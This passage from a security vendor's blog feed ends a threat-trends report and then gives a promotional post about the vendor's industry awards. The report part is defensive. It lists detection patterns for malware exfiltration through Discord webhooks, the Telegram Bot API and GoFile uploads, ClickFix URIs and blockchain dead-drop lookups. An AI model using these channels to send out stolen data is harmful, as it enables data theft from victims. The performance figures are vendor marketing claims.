<li>Monitoring must be tuned to alert on pages that urge users to execute PowerShell or CMD commands to resolve browser or document errors.</li>



<li>Establish specialized monitoring for suspicious URI patterns associated with ClickFix infrastructure, including calls to /jsrepo?rnd=.</li>
</ul>



<h3 class="wp-block-heading">Stay updated on the latest ClickFix attacks</h3>



<p class="wp-block-paragraph">Use queries like:</p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup#{%22query%22:%22threatName:%5C%22clickfix%5C%22%20AND%20submissionCountry:%5C%22de%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">threatName:&#8221;clickfix&#8221; AND submissionCountry:&#8221;de&#8221;</a></p>



<p class="wp-block-paragraph">in Threat Intelligence Lookup to uncover threats in your industry and region.</p>



<h2 class="wp-block-heading"><strong>Trend 13: Discord, Telegram, and GoFile are used as exfiltration channels</strong></h2>



<div class="wp-block-media-text is-stacked-on-mobile"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="670" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.50.07.png" alt="" class="wp-image-23386 size-full" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.50.07.png 670w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.50.07-300x262.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.50.07-370x324.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-24-at-13.50.07-270x236.png 270w" sizes="auto, (max-width: 670px) 100vw, 670px" /></figure><div class="wp-block-media-text__content">
<p class="wp-block-paragraph">In stealer attacks, exfiltration increasingly relies on legitimate public services such as Discord, Telegram, and GoFile instead of attacker-owned infrastructure. </p>



<p class="wp-block-paragraph">These services are often available from corporate networks and allow attackers to transfer stolen data without maintaining their own C2 infrastructure.</p>
</div></div>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading"><strong>Legitimate Services Hide Exfiltration</strong></h4>



<p class="wp-block-paragraph">Traffic to Discord, Telegram, or GoFile may look legitimate, but in stealer activity it can represent the final stage of the attack: sending stolen data to the operator.</p>



<h4 class="wp-block-heading"><strong>Blocking Entire Services Is Not Practical</strong></h4>



<p class="wp-block-paragraph">Because these services can have legitimate use, blocking them altogether may not be a reasonable option for many organizations.</p>



<h4 class="wp-block-heading"><strong>Context Determines Malicious Intent</strong></h4>



<p class="wp-block-paragraph">SOC teams need process, activity, and data-collection context to understand whether a connection to these services was normal traffic or actual exfiltration.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Monitor activity related to legitimate services like Discord, Telegram, and GoFile. It&#8217;s key to assess the context: which process connected to the service, what happened before the connection, and whether data collection or archive creation occurred.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Monitor Discord webhook activity, especially requests to <code>discord.com/api/webhooks/</code>, <code>discordapp.com/api/webhooks/</code>, and related endpoints. Focus on <code>POST</code> requests, <code>multipart/form-data</code>, archive uploads, and unusual process origins. Prioritize detections where webhook URLs, IDs, or tokens appear in malware configs, memory, files, or command-line artifacts.</li>



<li>For Telegram, track Bot API usage via <code>api.telegram.org/bot</code>, including <code>/sendMessage</code>, <code>/sendDocument</code>, and <code>/sendPhoto</code>. Watch for bot tokens, <code>chat_id</code>, and file transfers using <code>POST</code> with <code>multipart/form-data</code>. Flag cases where tokens or chat IDs are embedded in malware artifacts or suspicious processes send data to Telegram.</li>



<li>For GoFile, monitor <code>gofile.io</code> and related upload endpoints like <code>api.gofile.io</code> and <code>/uploadFile</code>. Focus on <code>POST</code> uploads, archive creation (<code>.zip</code>, <code>.rar</code>, <code>.7z</code>), and generated download links. Prioritize cases where uploaded archives are later shared via Telegram or Discord.</li>
</ul>



<p class="wp-block-paragraph"><strong>Read more: </strong><a href="https://any.run/cybersecurity-blog/intercept-stolen-data-in-telegram/">How to Intercept D</a><a href="https://any.run/cybersecurity-blog/intercept-stolen-data-in-telegram/" target="_blank" rel="noreferrer noopener">a</a><a href="https://any.run/cybersecurity-blog/intercept-stolen-data-in-telegram/">ta Exfiltrated by Malware via Telegram and Discord</a></p>



<h2 class="wp-block-heading"><strong>Trend 14: Phishing imitates payment and government services to target employees </strong></h2>



<p class="wp-block-paragraph">This trend is built around phishing, payment data theft, and business process abuse. Phishing campaigns increasingly imitate not only fine-payment and government-fee services, but also banks, tax authorities, municipal portals, and other official payment services.</p>



<p class="wp-block-paragraph">Attackers target employees involved in finance, accounting, legal, procurement, fleet management, and decision-making processes by using themes such as taxes, fines, debts, refunds, and mandatory payments.</p>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading"><strong>Attacks Blend into Business Workflows</strong></h4>



<p class="wp-block-paragraph">These attacks look like normal financial or administrative tasks, such as checking a fine, paying a fee, confirming a debt, or processing a tax notice.</p>



<h4 class="wp-block-heading"><strong>Employees May Complete the Scenario Manually</strong></h4>



<p class="wp-block-paragraph">Because the request appears relevant to their work, employees may follow the steps themselves and enter sensitive data into a fake form.</p>



<h4 class="wp-block-heading"><strong>No Malware Means Lower Detection Confidence</strong></h4>



<p class="wp-block-paragraph">There may be no malware, exploit, or obvious payload. Without context around the user, department, domain, and page content, the incident may look like a low-priority suspicious URL rather than business process abuse.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Treat payment- and government-themed phishing as business process abuse, not just generic phishing. SOC teams should prioritize the incident based on the user’s role, department, and potential financial exposure.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<ul class="wp-block-list">
<li>Monitoring must prioritize combinations of high-risk indicators: newly registered or low-reputation domains combined with service impersonation, clear payment intent, and access by a corporate user.</li>



<li>Track themes related to debts, payment checks, and official notices where the sender&#8217;s display name imitates a municipal body or bank but the underlying link points to a non-official domain.</li>



<li>Detection rules should flag POST requests occurring after page visits to uncategorized domains, as this indicates data submission into a form.</li>
</ul>



<p class="wp-block-paragraph"><strong>Read more:</strong> <a href="https://any.run/cybersecurity-blog/how-to-investigate-government-cyber-attacks/" target="_blank" rel="noreferrer noopener">Cyber Attacks on Government Agencies: Detect and Investigate with ANY.RUN for Fast Response</a></p>



<h2 class="wp-block-heading"><strong>Trend 15: Dead Drop Resolvers are being used to hide C2 and delivery chains</strong></h2>



<p class="wp-block-paragraph">Malware actors increasingly use Dead Drop Resolvers (DDR) as an infrastructure layer. Instead of storing the final C2 URL, configuration, or delivery-chain elements directly in the sample, malware retrieves them from external sources during execution.</p>



<p class="wp-block-paragraph">These sources can include smart contracts and blockchain infrastructure, as seen in EtherHiding, Steam profiles, or other legitimate and out-of-band resources where attackers can hide C2 configuration.</p>



<h3 class="wp-block-heading"><strong>SOC &amp; Business Impact</strong></h3>



<h4 class="wp-block-heading"><strong>Static IOCs Lose Value</strong></h4>



<p class="wp-block-paragraph">DDR makes malware infrastructure more resilient because the final C2 may be absent from the sample and only appear during execution.</p>



<h4 class="wp-block-heading"><strong>Legitimate Sources Hide C2 Resolution</strong></h4>



<p class="wp-block-paragraph">The DDR source may look legitimate, such as a blockchain RPC endpoint or a Steam profile, making detection and triage harder.</p>



<h4 class="wp-block-heading"><strong>Attack Context Can Be Missed</strong></h4>



<p class="wp-block-paragraph">If teams only see the final C2 connection or only the DDR request, they may miss how the malware resolved infrastructure and continued the attack chain.</p>



<h3 class="wp-block-heading"><strong>Risk Mitigation Playbook</strong></h3>



<h4 class="wp-block-heading"><strong>Strategic Focus</strong></h4>



<p class="wp-block-paragraph">Shift detection from isolated IOCs to the full behavioral chain of C2 resolution. SOC and MSSP teams should treat DDR activity as a separate detection category, even in cases when C2 infrastructure appears only during execution.</p>



<h4 class="wp-block-heading"><strong>Operational Steps</strong></h4>



<p class="wp-block-paragraph">Actively track indicators of blockchain-based DDR (EtherHiding), including eth_call, eth_getStorageAt, and generic JSON-RPC requests.</p>



<p class="wp-block-paragraph">Flag requests to steamcommunity.com/profiles/ that originate from non-browser or non-Steam processes, particularly when these requests are followed by connections to unknown or rare external hosts.</p>



<p class="wp-block-paragraph">Proactively correlate all DDR requests with subsequent C2 connections, payload execution, or exfiltration activity.</p>



<p class="wp-block-paragraph"><strong>Read more</strong>: <a href="https://any.run/cybersecurity-blog/kamasers-technical-analysis/" target="_blank" rel="noreferrer noopener">Kamasers: A Multi-Vector DDoS Botnet Targeting Organizations Worldwide</a></p>



<h2 class="wp-block-heading">How to Mitigate with ANY.RUN </h2>



<p class="wp-block-paragraph">The report’s findings point to the need for SOC teams to detect attacks earlier and see more of the attack chain before damage is done. </p>



<p class="wp-block-paragraph">Across the 15 trends, attackers repeatedly abuse trusted services, legitimate workflows, browser-based flows, identity mechanisms, and dynamic infrastructure to avoid simple detection. </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="348" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-15-at-10.49.58-1024x348.png" alt="" class="wp-image-23090" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-15-at-10.49.58-1024x348.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-15-at-10.49.58-300x102.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-15-at-10.49.58-768x261.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-15-at-10.49.58-1536x522.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-15-at-10.49.58-2048x697.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-15-at-10.49.58-370x126.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-15-at-10.49.58-270x92.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Screenshot-2026-09-15-at-10.49.58-740x252.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Integrated ANY.RUN solutions deliver measurable value across triage, detection, and response</em> </figcaption></figure>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> helps SOC and MSSP teams close these gaps by combining interactive analysis with fresh, sandbox-validated threat intelligence. With ANY.RUN, security teams can: </p>



<ul class="wp-block-list">
<li><strong>Reduce MTTR by 21 minutes per case </strong>by quickly reconstructing attack chains across phishing, payload delivery, RMM installation, C2 resolution, and exfiltration. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Increase detection rate by 36%</strong> with <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">deeper visibility</a> into evasive phishing, malware behavior, browser activity, redirects, scripts, and infrastructure links. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Achieve an MTTD of 14 seconds</strong> by safely detonating suspicious files, URLs, phishing pages, and malware across Windows, Linux, Android, and macOS. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Prioritize incidents with more confidence</strong> using <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>, <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>, and expert-led <a href="https://intelligence.any.run/reports?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktotireports" target="_blank" rel="noreferrer noopener">TI Reports</a> to connect indicators with behavioral context and current threat activity.</li>
</ul>



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">ANY.RUN’s H1 2026 Cyber Risk Report highlights how <a href="https://any.run/cybersecurity-blog/hvnc-backdoor-targets-latam/" target="_blank" rel="noreferrer noopener">phishing</a>, malware, identity abuse, and trusted infrastructure misuse are changing the way SOC teams detect, investigate, and respond to threats. The findings show why earlier detection, broader visibility, and context-rich threat intelligence are becoming essential for modern security operations. </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> is a leading provider of interactive malware analysis and threat intelligence solutions trusted by more than 16,000 organizations worldwide, including 74% of the Fortune 100. </p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=h1_2026_cyber_risk_report&amp;utm_term=150926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence solutions</a> help SOC teams analyze suspicious files and URLs, uncover malicious behavior, enrich investigations with actionable context, and connect related activity across infrastructure and campaigns. </p>



<p class="wp-block-paragraph">With deeper visibility and fresh threat context, security teams can reduce investigation time, lower MTTD and MTTR, and contain threats before business impact grows. </p>



<h2 class="wp-block-heading">FAQ </h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1789461080830"><strong class="schema-faq-question">What is the H1 2026 Cyber Risk Report? <br></strong> <p class="schema-faq-answer">The H1 2026 Cyber Risk Report is ANY.RUN’s analysis of 15 key cyber risk trends observed in the first half of 2026. It explains how current phishing, malware, identity, and infrastructure abuse techniques affect SOC detection, triage, investigation, and response. </p> </div> <div class="schema-faq-section" id="faq-question-1789461086413"><strong class="schema-faq-question">Where can I get the full H1 2026 Cyber Risk Report? </strong> <p class="schema-faq-answer">You can access the full report by filling out the form in this article. </p> </div> <div class="schema-faq-section" id="faq-question-1789461093767"><strong class="schema-faq-question">What data is the report based on? </strong> <p class="schema-faq-answer">The report is based on real-world threat submissions analyzed in ANY.RUN, including activity from SOC teams, MSSPs, researchers, and security analysts worldwide. </p> </div> <div class="schema-faq-section" id="faq-question-1789461102917"><strong class="schema-faq-question">Who is this report for? <br></strong> <p class="schema-faq-answer">The report is designed for CISOs, SOC leaders, MSSP managers, threat intelligence teams, incident response teams, and security professionals who need to understand how current attack techniques are changing. </p> </div> </div>
<p>The post <a href="https://any.run/cybersecurity-blog/h1-2026-cyber-risk-report/">6 Months on Alert: Get H1 2026 Cyber Risk Report for SOCs and MSSPs</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/h1-2026-cyber-risk-report/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>ANY.RUN Secures Leader Status in G2’s Malware Analysis Rankings</title>
		<link>https://any.run/cybersecurity-blog/g2-leader-fall-2026/</link>
					<comments>https://any.run/cybersecurity-blog/g2-leader-fall-2026/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Thu, 10 Sep 2026 09:39:01 +0000</pubDate>
				<category><![CDATA[News]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=23067</guid>

					<description><![CDATA[<p>We’re excited to share that ANY.RUN has once again been recognized by G2 as a leader in malware analysis. In G2’s Fall 2026 awards, we earned both Momentum Leader and Grid Leader recognition, highlighting our continued growth and strong position in the market. Most importantly, these achievements reflect the trust security professionals place in ANY.RUN [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/g2-leader-fall-2026/">ANY.RUN Secures Leader Status in G2’s Malware Analysis Rankings</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">We’re excited to share that <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> has <a href="https://any.run/cybersecurity-blog/g2-summer-awards-2026/" target="_blank" rel="noreferrer noopener">once again</a> been recognized by G2 as a leader in malware analysis. </p>



<p class="wp-block-paragraph">In G2’s Fall 2026 awards, we earned both <a href="https://www.g2.com/reports/19c6dd85-1509-4852-a7e3-532b1dcad4fd/preview?product=any-run-sandbox&amp;_gl=1*qg889r*_ga*NDY2NDAzMDM4LjE3ODM2MDI4NDI." target="_blank" rel="noreferrer noopener"><strong>Momentum Leader</strong></a> and <a href="https://www.g2.com/reports/79822bf6-40c1-4fcb-a26b-a14e34b5f279/preview?product=any-run-sandbox&amp;_gl=1*1j2epdy*_ga*NDY2NDAzMDM4LjE3ODM2MDI4NDI." target="_blank" rel="noreferrer noopener"><strong>Grid Leader</strong></a> recognition, highlighting our continued growth and strong position in the market. Most importantly, these achievements reflect the trust <a href="https://any.run/cybersecurity-blog/german-manufacturer-success-story/" target="_blank" rel="noreferrer noopener">security professionals</a> place in ANY.RUN every day to support their threat investigations. </p>



<h2 class="wp-block-heading">How ANY.RUN Delivers Measurable Value for Modern SOCs </h2>



<p class="wp-block-paragraph">G2’s Grid Leader and Momentum Leader awards offer two complementary perspectives on a technology solution. </p>



<p class="wp-block-paragraph">Being named a Grid Leader reflects strong customer satisfaction combined with a solid market presence. Momentum Leader recognition highlights products demonstrating significant momentum within their category.  </p>



<p class="wp-block-paragraph">For ANY.RUN, reaching both achievements in the malware analysis category demonstrates two things we care deeply about: delivering <a href="https://any.run/cybersecurity-blog/phishing-us-finance/" target="_blank" rel="noreferrer noopener">measurable value</a> to security teams and continuing to evolve alongside the threats they investigate. </p>



<p class="wp-block-paragraph">SOCs today need more than just a place to upload suspicious files. Analysts need <a href="https://any.run/cybersecurity-blog/in-browser-data-inspection/" target="_blank" rel="noreferrer noopener">instant visibility</a> into what a threat actually does. SOC leaders need confidence that their teams can investigate incidents efficiently and consistently. </p>



<p class="wp-block-paragraph">That is the problem <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">ANY.RUN’s Interactive Sandbox</a> continues to solve. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="2560" height="1211" src="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-scaled.png" alt="" class="wp-image-22257" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-scaled.png 2560w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-300x142.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-1024x485.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-768x363.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-1536x727.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-2048x969.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-370x175.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-270x128.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2025/09/Screenshot-2026-07-22-at-13.15.08-740x350.png 740w" sizes="auto, (max-width: 2560px) 100vw, 2560px" /><figcaption class="wp-element-caption"><em>ANY.RUN helps security teams streamline investigations, reduce costs, and stay compliant</em> </figcaption></figure>



<p class="wp-block-paragraph">ANY.RUN helps teams establish a more <a href="https://any.run/cybersecurity-blog/proactive-threat-hunting/" target="_blank" rel="noreferrer noopener">consistent approach</a> to threat investigation by giving analysts access to shared analysis and intelligence capabilities. This can reduce repetitive work, make investigation processes easier to standardize, and help teams make better use of their expertise. </p>



<p class="wp-block-paragraph">By supporting investigations across multiple environments, including Windows, Linux, macOS, and Android, we give teams broader visibility when analyzing threats that target different platforms. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
See what ANY.RUN can do for your SOC.<br>
Cut MTTR by 21 min per case &#038; <span class="highlight">respond with confidence</span>.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=g2-leader-fall-2026&#038;utm_term=100926&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Helping SOC Leaders Build More Efficient Operations </h2>



<p class="wp-block-paragraph">For <a href="https://any.run/cybersecurity-blog/enterprise-phishing-resilience/" target="_blank" rel="noreferrer noopener">SOC leaders</a>, the value of extended investigation opportunities extends beyond individual alerts. The bigger challenge is creating an operation that can <a href="https://any.run/cybersecurity-blog/mssp-triage-response-bottlenecks/" target="_blank" rel="noreferrer noopener">handle growing volumes of threats</a> without sacrificing analysis quality. </p>



<p class="wp-block-paragraph">ANY.RUN also fits into existing security workflows through integrations and team-oriented capabilities, helping organizations incorporate analysis into the processes they already use. </p>



<p class="wp-block-paragraph">At scale, this translates into a practical advantage: analysts can work from a common source of threat context, while security teams can connect ANY.RUN with existing SIEM, TIP, and SOAR environments through APIs, SDKs, and out-of-the-box integrations. </p>



<p class="wp-block-paragraph"><a href="https://any.run/integrations/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktointegrations" target="_blank" rel="noreferrer noopener">Explore all ANY.RUN integrations</a> </p>



<p class="wp-block-paragraph">By integrating ANY.RUN into their workflows, SOCs can improve operational efficiency at scale. 95% of SOCs report faster threat investigations, while teams can reduce MTTR by up to 21 minutes per case and cut Tier 1 workload by up to 20%. </p>



<h2 class="wp-block-heading">Recognition That Reflects the People Using ANY.RUN </h2>



<p class="wp-block-paragraph">The most meaningful part of each G2 recognition isn’t the badge itself but the experience behind it. </p>



<p class="wp-block-paragraph">ANY.RUN is used by over 700,000 security professionals around the world, as well as 16,000+ SOC and MSSP teams that <a href="https://any.run/cybersecurity-blog/streamline-your-soc/" target="_blank" rel="noreferrer noopener">rely on our solutions</a> for malware analysis, threat intelligence, alert triage, phishing investigations, threat hunting, and incident response. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="2426" height="1058" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby.png" alt="" class="wp-image-23071" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby.png 2426w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-300x131.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-1024x447.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-768x335.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-1536x670.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-2048x893.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-370x161.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-270x118.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/anyruntrustedby-740x323.png 740w" sizes="auto, (max-width: 2426px) 100vw, 2426px" /><figcaption class="wp-element-caption">ANY.RUN is trusted by companies across industries and regions</figcaption></figure>



<p class="wp-block-paragraph">Every investigation performed with ANY.RUN represents a real security decision: whether an alert is malicious, whether a link is safe, whether an endpoint has been compromised, or whether an incident requires escalation. </p>



<p class="wp-block-paragraph">Our responsibility is to make those decisions easier to reach and more reliable. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Turn threat investigations into <span class="highlight">faster decisions</span>. <br>
Discover how to streamline workflows with ANY.RUN.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Explore for Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">Being named a Momentum Leader and Grid Leader in G2’s Fall 2026 rankings is recognition of the progress we have made with the cybersecurity community and motivation to keep improving. </p>



<p class="wp-block-paragraph">We will continue investing in the capabilities that matter most to security teams: faster investigations, richer context, stronger threat intelligence, broader threat coverage, and workflows that reduce unnecessary effort for analysts. </p>



<p class="wp-block-paragraph">For analysts, that means better tools for understanding what threats actually do. For SOC leaders, it means building more efficient, consistent, and resilient security operations. And for the organizations they protect, it means turning threat data into confident action sooner. </p>



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> develops cybersecurity solutions for SOC and MSSP teams, supporting threat monitoring, detection, triage, investigation, and incident response.  </p>



<p class="wp-block-paragraph"><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive sandbox</a> analysis combined with <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=g2-leader-fall-2026&amp;utm_term=100926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">threat intelligence</a> capabilities supported by over 16,000 organizations worldwide help security professionals understand threats and make confident decisions faster. </p>



<p class="wp-block-paragraph">For enterprises, ANY.RUN helps reduce investigation time and analyst workload while supporting secure, compliant operations. </p>



<p class="wp-block-paragraph">ANY.RUN is SOC 2 Type II attested and committed to strong security control and customer data protection. Privacy is also ensured by SSO, MFA, role-based access controls, and integrations with existing security tools that help SOCs scale efficiently and maintain control. </p>



<h2 class="wp-block-heading">FAQ</h2>



